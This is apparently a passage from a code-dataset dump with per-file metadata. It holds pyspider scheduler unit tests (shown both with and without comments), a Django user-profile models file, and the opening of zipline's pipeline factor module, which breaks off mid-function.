import xmlrpclib as xmlrpc_client
from pyspider.scheduler.scheduler import Scheduler
from pyspider.database.sqlite import taskdb, projectdb, resultdb
from pyspider.libs.multiprocessing_queue import Queue
from pyspider.libs.utils import run_in_thread
class TestScheduler(unittest.TestCase):
taskdb_path = './data/tests/task.db'
projectdb_path = './data/tests/project.db'
resultdb_path = './data/tests/result.db'
check_project_time = 1
scheduler_xmlrpc_port = 23333
@classmethod
def setUpClass(self):
shutil.rmtree('./data/tests', ignore_errors=True)
os.makedirs('./data/tests')
def get_taskdb():
return taskdb.TaskDB(self.taskdb_path)
self.taskdb = get_taskdb()
def get_projectdb():
return projectdb.ProjectDB(self.projectdb_path)
self.projectdb = get_projectdb()
def get_resultdb():
return resultdb.ResultDB(self.resultdb_path)
self.resultdb = get_resultdb()
self.newtask_queue = Queue(10)
self.status_queue = Queue(10)
self.scheduler2fetcher = Queue(10)
self.rpc = xmlrpc_client.ServerProxy('http://localhost:%d' % self.scheduler_xmlrpc_port)
def run_scheduler():
scheduler = Scheduler(taskdb=get_taskdb(), projectdb=get_projectdb(),
newtask_queue=self.newtask_queue, status_queue=self.status_queue,
out_queue=self.scheduler2fetcher, data_path="./data/tests/",
resultdb=get_resultdb())
scheduler.UPDATE_PROJECT_INTERVAL = 0.1
scheduler.LOOP_INTERVAL = 0.1
scheduler.INQUEUE_LIMIT = 10
scheduler.DELETE_TIME = 0
scheduler.DEFAULT_RETRY_DELAY = {'': 5}
scheduler._last_tick = int(time.time()) # not dispatch cronjob
run_in_thread(scheduler.xmlrpc_run, port=self.scheduler_xmlrpc_port)
scheduler.run()
self.process = run_in_thread(run_scheduler)
time.sleep(1)
@classmethod
def tearDownClass(self):
if self.process.is_alive():
self.rpc._quit()
self.process.join(5)
assert not self.process.is_alive()
shutil.rmtree('./data/tests', ignore_errors=True)
time.sleep(1)
def test_10_new_task_ignore(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url'
})
self.assertEqual(self.rpc.size(), 0)
self.assertEqual(len(self.rpc.get_active_tasks()), 0)
def test_20_new_project(self):
self.projectdb.insert('test_project', {
'name': 'test_project',
'group': 'group',
'status': 'TODO',
'script': 'import time\nprint(time.time())',
'comments': 'test project',
'rate': 1.0,
'burst': 10,
})
def test_30_update_project(self):
from six.moves import queue as Queue
with self.assertRaises(Queue.Empty):
task = self.scheduler2fetcher.get(timeout=1)
self.projectdb.update('test_project', status="DEBUG")
time.sleep(0.1)
self.rpc.update_project()
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
self.assertEqual(task['url'], 'data:,_on_get_info')
def test_34_new_not_used_project(self):
self.projectdb.insert('test_project_not_started', {
'name': 'test_project_not_started',
'group': 'group',
'status': 'RUNNING',
'script': 'import time\nprint(time.time())',
'comments': 'test project',
'rate': 1.0,
'burst': 10,
})
task = self.scheduler2fetcher.get(timeout=1)
self.assertEqual(task['taskid'], '_on_get_info')
def test_35_new_task(self):
time.sleep(0.2)
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 0,
},
})
time.sleep(0.5)
task = self.scheduler2fetcher.get(timeout=10)
self.assertGreater(len(self.rpc.get_active_tasks()), 0)
self.assertIsNotNone(task)
self.assertEqual(task['project'], 'test_project')
self.assertIn('schedule', task)
self.assertIn('fetch', task)
self.assertIn('process', task)
self.assertIn('track', task)
self.assertEqual(task['fetch']['data'], 'abc')
def test_37_force_update_processing_task(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url_force_update',
'schedule': {
'age': 10,
'force_update': True,
},
})
time.sleep(0.2)
# it should not block next
def test_40_taskdone_error_no_project(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'no_project',
'url': 'url'
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 1)
def test_50_taskdone_error_no_track(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url'
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 1)
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {}
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 1)
def test_60_taskdone_failed_retry(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': False
},
}
})
from six.moves import queue as Queue
with self.assertRaises(Queue.Empty):
task = self.scheduler2fetcher.get(timeout=4)
task = self.scheduler2fetcher.get(timeout=5)
self.assertIsNotNone(task)
def test_70_taskdone_ok(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': True
},
}
})
time.sleep(0.2)
self.assertEqual(self.rpc.size(), 0)
def test_80_newtask_age_ignore(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 30,
},
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 0)
def test_82_newtask_via_rpc(self):
self.rpc.newtask({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 30,
},
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 0)
def test_90_newtask_with_itag(self):
time.sleep(0.1)
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'itag': "abc",
'retries': 1
},
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
self.test_70_taskdone_ok()
def test_a10_newtask_restart_by_age(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 0,
'retries': 1
},
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
def test_a20_failed_retry(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': False
},
}
})
task = self.scheduler2fetcher.get(timeout=5)
self.assertIsNotNone(task)
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {
'fetch': {
'ok': False
},
'process': {
'ok': False
},
}
})
from six.moves import queue as Queue
with self.assertRaises(Queue.Empty):
self.scheduler2fetcher.get(timeout=5)
def test_a30_task_verify(self):
self.assertFalse(self.rpc.newtask({
#'taskid': 'taskid#',
'project': 'test_project',
'url': 'url',
}))
self.assertFalse(self.rpc.newtask({
'taskid': 'taskid#',
#'project': 'test_project',
'url': 'url',
}))
self.assertFalse(self.rpc.newtask({
'taskid': 'taskid#',
'project': 'test_project',
#'url': 'url',
}))
self.assertFalse(self.rpc.newtask({
'taskid': 'taskid#',
'project': 'not_exist_project',
'url': 'url',
}))
self.assertTrue(self.rpc.newtask({
'taskid': 'taskid#',
'project': 'test_project',
'url': 'url',
}))
def test_a40_success_recrawl(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 0,
'retries': 1,
'auto_recrawl': True,
},
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'schedule': {
'age': 0,
'retries': 1,
'auto_recrawl': True,
},
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': True
},
}
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
def test_a50_failed_recrawl(self):
for i in range(3):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'schedule': {
'age': 0,
'retries': 1,
'auto_recrawl': True,
},
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': False
},
}
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
def test_a60_disable_recrawl(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'schedule': {
'age': 0,
'retries': 1,
},
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': True
},
}
})
from six.moves import queue as Queue
with self.assertRaises(Queue.Empty):
self.scheduler2fetcher.get(timeout=5)
def test_x10_inqueue_limit(self):
self.projectdb.insert('test_inqueue_project', {
'name': 'test_inqueue_project',
'group': 'group',
'status': 'DEBUG',
'script': 'import time\nprint(time.time())',
'comments': 'test project',
'rate': 0,
'burst': 0,
})
time.sleep(0.1)
pre_size = self.rpc.size()
for i in range(20):
self.newtask_queue.put({
'taskid': 'taskid%d' % i,
'project': 'test_inqueue_project',
'url': 'url',
'schedule': {
'age': 3000,
'force_update': True,
},
})
time.sleep(1)
self.assertEqual(self.rpc.size() - pre_size, 10)
def test_x20_delete_project(self):
self.assertIsNotNone(self.projectdb.get('test_inqueue_project'))
#self.assertIsNotNone(self.taskdb.get_task('test_inqueue_project', 'taskid1'))
self.projectdb.update('test_inqueue_project', status="STOP", group="lock,delete")
time.sleep(1)
self.assertIsNone(self.projectdb.get('test_inqueue_project'))
self.taskdb._list_project()
self.assertIsNone(self.taskdb.get_task('test_inqueue_project', 'taskid1'))
def test_z10_startup(self):
self.assertTrue(self.process.is_alive())
def test_z20_quit(self):
self.rpc._quit()
time.sleep(0.2)
self.assertFalse(self.process.is_alive())
self.assertEqual(
self.taskdb.get_task('test_project', 'taskid')['status'],
self.taskdb.SUCCESS
)
if __name__ == '__main__':
unittest.main()
| 30.671821
| 99
| 0.503893
|
import os
import time
import shutil
import unittest2 as unittest
import logging
import logging.config
logging.config.fileConfig("pyspider/logging.conf")
from pyspider.scheduler.task_queue import TaskQueue
class TestTaskQueue(unittest.TestCase):
@classmethod
def setUpClass(self):
self.task_queue = TaskQueue()
self.task_queue.rate = 100000
self.task_queue.burst = 100000
self.task_queue.processing_timeout = 0.5
def test_10_put(self):
self.task_queue.put('a3', 0, time.time() + 0.5)
self.task_queue.put('a4', 3, time.time() + 0.2)
self.task_queue.put('a2', 0)
self.task_queue.put('a1', 1)
self.assertEqual(self.task_queue.size(), 4)
def test_20_update(self):
self.task_queue.put('a2', 4)
self.assertEqual(self.task_queue.size(), 4)
self.task_queue.put('a3', 2, 0)
self.assertEqual(self.task_queue.size(), 4)
def test_30_get_from_priority_queue(self):
self.assertEqual(self.task_queue.get(), 'a2')
self.assertEqual(self.task_queue.size(), 4)
def test_40_time_queue_1(self):
self.task_queue.check_update()
self.assertEqual(self.task_queue.get(), 'a3')
self.assertEqual(self.task_queue.size(), 4)
def test_50_time_queue_2(self):
time.sleep(0.3)
self.task_queue.check_update()
self.assertEqual(self.task_queue.get(), 'a4')
self.assertEqual(self.task_queue.get(), 'a1')
self.assertEqual(self.task_queue.size(), 4)
def test_60_processing_queue(self):
time.sleep(0.5)
self.task_queue.check_update()
self.assertEqual(self.task_queue.get(), 'a2')
self.assertEqual(len(self.task_queue), 4)
self.assertEqual(self.task_queue.get(), 'a4')
self.assertEqual(self.task_queue.get(), 'a3')
self.assertEqual(self.task_queue.get(), 'a1')
self.assertEqual(len(self.task_queue), 4)
def test_70_done(self):
self.assertTrue(self.task_queue.done('a2'))
self.assertTrue(self.task_queue.done('a1'))
self.assertEqual(len(self.task_queue), 2)
self.assertTrue(self.task_queue.done('a4'))
self.assertTrue(self.task_queue.done('a3'))
self.assertEqual(len(self.task_queue), 0)
from pyspider.scheduler.token_bucket import Bucket
class TestBucket(unittest.TestCase):
def test_bucket(self):
bucket = Bucket(100, 1000)
self.assertEqual(bucket.get(), 1000)
time.sleep(0.1)
self.assertEqual(bucket.get(), 1000)
bucket.desc(100)
self.assertEqual(bucket.get(), 900)
time.sleep(0.1)
self.assertAlmostEqual(bucket.get(), 910, delta=2)
time.sleep(0.1)
self.assertAlmostEqual(bucket.get(), 920, delta=2)
try:
from six.moves import xmlrpc_client
except ImportError:
import xmlrpclib as xmlrpc_client
from pyspider.scheduler.scheduler import Scheduler
from pyspider.database.sqlite import taskdb, projectdb, resultdb
from pyspider.libs.multiprocessing_queue import Queue
from pyspider.libs.utils import run_in_thread
class TestScheduler(unittest.TestCase):
taskdb_path = './data/tests/task.db'
projectdb_path = './data/tests/project.db'
resultdb_path = './data/tests/result.db'
check_project_time = 1
scheduler_xmlrpc_port = 23333
@classmethod
def setUpClass(self):
shutil.rmtree('./data/tests', ignore_errors=True)
os.makedirs('./data/tests')
def get_taskdb():
return taskdb.TaskDB(self.taskdb_path)
self.taskdb = get_taskdb()
def get_projectdb():
return projectdb.ProjectDB(self.projectdb_path)
self.projectdb = get_projectdb()
def get_resultdb():
return resultdb.ResultDB(self.resultdb_path)
self.resultdb = get_resultdb()
self.newtask_queue = Queue(10)
self.status_queue = Queue(10)
self.scheduler2fetcher = Queue(10)
self.rpc = xmlrpc_client.ServerProxy('http://localhost:%d' % self.scheduler_xmlrpc_port)
def run_scheduler():
scheduler = Scheduler(taskdb=get_taskdb(), projectdb=get_projectdb(),
newtask_queue=self.newtask_queue, status_queue=self.status_queue,
out_queue=self.scheduler2fetcher, data_path="./data/tests/",
resultdb=get_resultdb())
scheduler.UPDATE_PROJECT_INTERVAL = 0.1
scheduler.LOOP_INTERVAL = 0.1
scheduler.INQUEUE_LIMIT = 10
scheduler.DELETE_TIME = 0
scheduler.DEFAULT_RETRY_DELAY = {'': 5}
scheduler._last_tick = int(time.time())
run_in_thread(scheduler.xmlrpc_run, port=self.scheduler_xmlrpc_port)
scheduler.run()
self.process = run_in_thread(run_scheduler)
time.sleep(1)
@classmethod
def tearDownClass(self):
if self.process.is_alive():
self.rpc._quit()
self.process.join(5)
assert not self.process.is_alive()
shutil.rmtree('./data/tests', ignore_errors=True)
time.sleep(1)
def test_10_new_task_ignore(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url'
})
self.assertEqual(self.rpc.size(), 0)
self.assertEqual(len(self.rpc.get_active_tasks()), 0)
def test_20_new_project(self):
self.projectdb.insert('test_project', {
'name': 'test_project',
'group': 'group',
'status': 'TODO',
'script': 'import time\nprint(time.time())',
'comments': 'test project',
'rate': 1.0,
'burst': 10,
})
def test_30_update_project(self):
from six.moves import queue as Queue
with self.assertRaises(Queue.Empty):
task = self.scheduler2fetcher.get(timeout=1)
self.projectdb.update('test_project', status="DEBUG")
time.sleep(0.1)
self.rpc.update_project()
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
self.assertEqual(task['url'], 'data:,_on_get_info')
def test_34_new_not_used_project(self):
self.projectdb.insert('test_project_not_started', {
'name': 'test_project_not_started',
'group': 'group',
'status': 'RUNNING',
'script': 'import time\nprint(time.time())',
'comments': 'test project',
'rate': 1.0,
'burst': 10,
})
task = self.scheduler2fetcher.get(timeout=1)
self.assertEqual(task['taskid'], '_on_get_info')
def test_35_new_task(self):
time.sleep(0.2)
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 0,
},
})
time.sleep(0.5)
task = self.scheduler2fetcher.get(timeout=10)
self.assertGreater(len(self.rpc.get_active_tasks()), 0)
self.assertIsNotNone(task)
self.assertEqual(task['project'], 'test_project')
self.assertIn('schedule', task)
self.assertIn('fetch', task)
self.assertIn('process', task)
self.assertIn('track', task)
self.assertEqual(task['fetch']['data'], 'abc')
def test_37_force_update_processing_task(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url_force_update',
'schedule': {
'age': 10,
'force_update': True,
},
})
time.sleep(0.2)
def test_40_taskdone_error_no_project(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'no_project',
'url': 'url'
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 1)
def test_50_taskdone_error_no_track(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url'
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 1)
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {}
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 1)
def test_60_taskdone_failed_retry(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': False
},
}
})
from six.moves import queue as Queue
with self.assertRaises(Queue.Empty):
task = self.scheduler2fetcher.get(timeout=4)
task = self.scheduler2fetcher.get(timeout=5)
self.assertIsNotNone(task)
def test_70_taskdone_ok(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': True
},
}
})
time.sleep(0.2)
self.assertEqual(self.rpc.size(), 0)
def test_80_newtask_age_ignore(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 30,
},
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 0)
def test_82_newtask_via_rpc(self):
self.rpc.newtask({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 30,
},
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 0)
def test_90_newtask_with_itag(self):
time.sleep(0.1)
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'itag': "abc",
'retries': 1
},
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
self.test_70_taskdone_ok()
def test_a10_newtask_restart_by_age(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 0,
'retries': 1
},
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
def test_a20_failed_retry(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': False
},
}
})
task = self.scheduler2fetcher.get(timeout=5)
self.assertIsNotNone(task)
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {
'fetch': {
'ok': False
},
'process': {
'ok': False
},
}
})
from six.moves import queue as Queue
with self.assertRaises(Queue.Empty):
self.scheduler2fetcher.get(timeout=5)
def test_a30_task_verify(self):
self.assertFalse(self.rpc.newtask({
'project': 'test_project',
'url': 'url',
}))
self.assertFalse(self.rpc.newtask({
'taskid': 'taskid#',
'url': 'url',
}))
self.assertFalse(self.rpc.newtask({
'taskid': 'taskid#',
'project': 'test_project',
}))
self.assertFalse(self.rpc.newtask({
'taskid': 'taskid#',
'project': 'not_exist_project',
'url': 'url',
}))
self.assertTrue(self.rpc.newtask({
'taskid': 'taskid#',
'project': 'test_project',
'url': 'url',
}))
def test_a40_success_recrawl(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 0,
'retries': 1,
'auto_recrawl': True,
},
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'schedule': {
'age': 0,
'retries': 1,
'auto_recrawl': True,
},
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': True
},
}
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
def test_a50_failed_recrawl(self):
for i in range(3):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'schedule': {
'age': 0,
'retries': 1,
'auto_recrawl': True,
},
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': False
},
}
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
def test_a60_disable_recrawl(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'schedule': {
'age': 0,
'retries': 1,
},
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': True
},
}
})
from six.moves import queue as Queue
with self.assertRaises(Queue.Empty):
self.scheduler2fetcher.get(timeout=5)
def test_x10_inqueue_limit(self):
self.projectdb.insert('test_inqueue_project', {
'name': 'test_inqueue_project',
'group': 'group',
'status': 'DEBUG',
'script': 'import time\nprint(time.time())',
'comments': 'test project',
'rate': 0,
'burst': 0,
})
time.sleep(0.1)
pre_size = self.rpc.size()
for i in range(20):
self.newtask_queue.put({
'taskid': 'taskid%d' % i,
'project': 'test_inqueue_project',
'url': 'url',
'schedule': {
'age': 3000,
'force_update': True,
},
})
time.sleep(1)
self.assertEqual(self.rpc.size() - pre_size, 10)
def test_x20_delete_project(self):
self.assertIsNotNone(self.projectdb.get('test_inqueue_project'))
self.projectdb.update('test_inqueue_project', status="STOP", group="lock,delete")
time.sleep(1)
self.assertIsNone(self.projectdb.get('test_inqueue_project'))
self.taskdb._list_project()
self.assertIsNone(self.taskdb.get_task('test_inqueue_project', 'taskid1'))
def test_z10_startup(self):
self.assertTrue(self.process.is_alive())
def test_z20_quit(self):
self.rpc._quit()
time.sleep(0.2)
self.assertFalse(self.process.is_alive())
self.assertEqual(
self.taskdb.get_task('test_project', 'taskid')['status'],
self.taskdb.SUCCESS
)
if __name__ == '__main__':
unittest.main()
| true
| true
|
f7054098e4be98d0e7ded502ff3e25b7159a4400
| 2,065
|
py
|
Python
|
profiles_api/models.py
|
tanveerahmaddar/profiles-rest-api
|
1fd5060677bbefd6bb2d02179587a1d8005f3bc1
|
[
"MIT"
] | null | null | null |
profiles_api/models.py
|
tanveerahmaddar/profiles-rest-api
|
1fd5060677bbefd6bb2d02179587a1d8005f3bc1
|
[
"MIT"
] | 5
|
2021-03-19T12:00:14.000Z
|
2022-02-10T09:29:53.000Z
|
profiles_api/models.py
|
tanveerahmaddar/profiles-rest-api
|
1fd5060677bbefd6bb2d02179587a1d8005f3bc1
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.contrib.auth.models import AbstractBaseUser
from django.contrib.auth.models import PermissionsMixin
from django.contrib.auth.models import BaseUserManager
from django.conf import settings
class UserProfileManager(BaseUserManager):
"""Manager for user profiles"""
def create_user(self, email, name, password=None):
"""create a new user profile"""
if not email:
raise ValueError("User must have and email address")
email = self.normalize_email(email)
user = self.model(email=email,name=name)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, name, password):
"""create and save new superuser with given details"""
user = self.create_user(email, name, password)
user.is_superuser = True
user.is_staff = True
user.save(using=self._db)
return user
class UserProfile(AbstractBaseUser,PermissionsMixin):
"""Database model for users in the system """
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
objects = UserProfileManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['name']
def get_full_name(self):
"""Retrieve full name of user"""
return self.name
def get_short_name(self):
"""Retrieve short name of user"""
return self.name
def __str__(self):
"""Return string representation of our user"""
return self.email
class ProfileFeedItem(models.Model):
"""Profile status update"""
user_profile = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
status_text = models.CharField(max_length=255)
created_on = models.DateTimeField(auto_now_add=True)
def __str__(self):
"""Retusnt the model as a string"""
return self.status_text
| 28.287671
| 64
| 0.680872
|
from django.db import models
from django.contrib.auth.models import AbstractBaseUser
from django.contrib.auth.models import PermissionsMixin
from django.contrib.auth.models import BaseUserManager
from django.conf import settings
class UserProfileManager(BaseUserManager):
def create_user(self, email, name, password=None):
if not email:
raise ValueError("User must have and email address")
email = self.normalize_email(email)
user = self.model(email=email,name=name)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, name, password):
user = self.create_user(email, name, password)
user.is_superuser = True
user.is_staff = True
user.save(using=self._db)
return user
class UserProfile(AbstractBaseUser,PermissionsMixin):
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
objects = UserProfileManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['name']
def get_full_name(self):
return self.name
def get_short_name(self):
return self.name
def __str__(self):
return self.email
class ProfileFeedItem(models.Model):
user_profile = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
status_text = models.CharField(max_length=255)
created_on = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.status_text
| true
| true
|
f70541311d2804278f3802c1efeec5ac64b356ca
| 41,783
|
py
|
Python
|
zipline/pipeline/factors/factor.py
|
degiere/zipline
|
bc0b117dc94b8e93081818964e3b1bdbf9b33abb
|
[
"Apache-2.0"
] | null | null | null |
zipline/pipeline/factors/factor.py
|
degiere/zipline
|
bc0b117dc94b8e93081818964e3b1bdbf9b33abb
|
[
"Apache-2.0"
] | null | null | null |
zipline/pipeline/factors/factor.py
|
degiere/zipline
|
bc0b117dc94b8e93081818964e3b1bdbf9b33abb
|
[
"Apache-2.0"
] | 1
|
2019-09-20T01:08:33.000Z
|
2019-09-20T01:08:33.000Z
|
"""
factor.py
"""
from functools import wraps
from operator import attrgetter
from numbers import Number
from numpy import inf, where
from toolz import curry
from zipline.errors import UnknownRankMethod
from zipline.lib.normalize import naive_grouped_rowwise_apply
from zipline.lib.rank import masked_rankdata_2d
from zipline.pipeline.classifiers import Classifier, Everything, Quantiles
from zipline.pipeline.mixins import (
CustomTermMixin,
LatestMixin,
PositiveWindowLengthMixin,
RestrictedDTypeMixin,
SingleInputMixin,
)
from zipline.pipeline.term import (
ComputableTerm,
NotSpecified,
NotSpecifiedType,
Term,
)
from zipline.pipeline.expression import (
BadBinaryOperator,
COMPARISONS,
is_comparison,
MATH_BINOPS,
method_name_for_op,
NumericalExpression,
NUMEXPR_MATH_FUNCS,
UNARY_OPS,
unary_op_name,
)
from zipline.pipeline.filters import (
Filter,
NumExprFilter,
PercentileFilter,
NullFilter,
)
from zipline.utils.input_validation import expect_types
from zipline.utils.math_utils import nanmean, nanstd
from zipline.utils.numpy_utils import (
bool_dtype,
coerce_to_dtype,
datetime64ns_dtype,
float64_dtype,
int64_dtype,
)
from zipline.utils.preprocess import preprocess
_RANK_METHODS = frozenset(['average', 'min', 'max', 'dense', 'ordinal'])
def coerce_numbers_to_my_dtype(f):
"""
A decorator for methods whose signature is f(self, other) that coerces
``other`` to ``self.dtype``.
This is used to make comparison operations between numbers and `Factor`
instances work independently of whether the user supplies a float or
integer literal.
For example, if I write::
my_filter = my_factor > 3
my_factor probably has dtype float64, but 3 is an int, so we want to coerce
to float64 before doing the comparison.
"""
@wraps(f)
def method(self, other):
if isinstance(other, Number):
other = coerce_to_dtype(self.dtype, other)
return f(self, other)
return method
@curry
def set_attribute(name, value):
"""
Decorator factory for setting attributes on a function.
Doesn't change the behavior of the wrapped function.
Usage
-----
>>> @set_attribute('__name__', 'foo')
... def bar():
... return 3
...
>>> bar()
3
>>> bar.__name__
'foo'
"""
def decorator(f):
setattr(f, name, value)
return f
return decorator
# Decorators for setting the __name__ and __doc__ properties of a decorated
# function.
# Example:
with_name = set_attribute('__name__')
with_doc = set_attribute('__doc__')
def binop_return_type(op):
if is_comparison(op):
return NumExprFilter
else:
return NumExprFactor
def binop_return_dtype(op, left, right):
"""
Compute the expected return dtype for the given binary operator.
Parameters
----------
op : str
Operator symbol, (e.g. '+', '-', ...).
left : numpy.dtype
Dtype of left hand side.
right : numpy.dtype
Dtype of right hand side.
Returns
-------
outdtype : numpy.dtype
The dtype of the result of `left <op> right`.
"""
if is_comparison(op):
if left != right:
raise TypeError(
"Don't know how to compute {left} {op} {right}.\n"
"Comparisons are only supported between Factors of equal "
"dtypes.".format(left=left, op=op, right=right)
)
return bool_dtype
elif left != float64_dtype or right != float64_dtype:
raise TypeError(
"Don't know how to compute {left} {op} {right}.\n"
"Arithmetic operators are only supported between Factors of "
"dtype 'float64'.".format(
left=left.name,
op=op,
right=right.name,
)
)
return float64_dtype
def binary_operator(op):
"""
Factory function for making binary operator methods on a Factor subclass.
Returns a function, "binary_operator" suitable for implementing functions
like __add__.
"""
# When combining a Factor with a NumericalExpression, we use this
# attrgetter instance to defer to the commuted implementation of the
# NumericalExpression operator.
commuted_method_getter = attrgetter(method_name_for_op(op, commute=True))
@with_doc("Binary Operator: '%s'" % op)
@with_name(method_name_for_op(op))
@coerce_numbers_to_my_dtype
def binary_operator(self, other):
# This can't be hoisted up a scope because the types returned by
# binop_return_type aren't defined when the top-level function is
# invoked in the class body of Factor.
return_type = binop_return_type(op)
if isinstance(self, NumExprFactor):
self_expr, other_expr, new_inputs = self.build_binary_op(
op, other,
)
return return_type(
"({left}) {op} ({right})".format(
left=self_expr,
op=op,
right=other_expr,
),
new_inputs,
dtype=binop_return_dtype(op, self.dtype, other.dtype),
)
elif isinstance(other, NumExprFactor):
# NumericalExpression overrides ops to correctly handle merging of
# inputs. Look up and call the appropriate reflected operator with
# ourself as the input.
return commuted_method_getter(other)(self)
elif isinstance(other, Term):
if self is other:
return return_type(
"x_0 {op} x_0".format(op=op),
(self,),
dtype=binop_return_dtype(op, self.dtype, other.dtype),
)
return return_type(
"x_0 {op} x_1".format(op=op),
(self, other),
dtype=binop_return_dtype(op, self.dtype, other.dtype),
)
elif isinstance(other, Number):
return return_type(
